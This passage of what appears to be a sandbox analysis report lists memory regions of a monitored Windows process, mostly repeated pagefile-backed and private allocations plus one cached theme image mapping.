"pagefile_0x0000000000610000" filename = "" Region: id = 13206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13221 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13222 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13241 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13242 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13258 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13259 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13266 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13267 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13310 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13311 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13313 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13338 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13339 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13341 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13342 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 13343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13380 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13381 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13384 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 13385 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 13386 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13390 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 13391 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 13392 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13393 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 13394 start_va = 